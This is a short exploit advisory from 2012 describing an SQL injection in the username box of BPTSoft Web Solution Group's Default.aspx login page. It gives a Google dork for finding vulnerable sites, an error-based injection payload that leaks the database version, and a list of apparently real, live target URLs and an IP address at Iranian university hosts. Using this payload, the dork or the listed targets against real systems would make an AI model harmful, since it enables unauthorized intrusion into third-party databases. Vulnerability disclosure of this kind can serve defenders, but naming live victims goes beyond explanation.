###############################  HUT CNIS #############################
# Exploit Title: BPTSoft Web Solution Group SQL INJECTION Vulnerability
# Date: [2012/1/1]
# Author: S.Azadi 
# Google Dork: site:.ir intext:Copyright 2005-2009 BPTSoft Web Solution Group
# Vulnerability Type: SQL Injection
# Version: 2005-2009
#---------------------------------------------------------------------

Technical Details:

- SQL INJECTION:
There is a SQLI vulnerability in “Default.aspx” , in username textbox.

PoC:
http://sitename/Default.aspx ||  Enter in username textbox: ' and 1=convert(int,(select @@version))--

sample code for username textbox: ' and 1=convert(int,(select @@version))--

http://fish.ghec.ac.ir/Default.aspx
http://95.82.105.54/Default.aspx
http://salary.yazduni.ac.ir/Default.aspx

#
#
#
###########- HUT Center for Network and Information Security -##########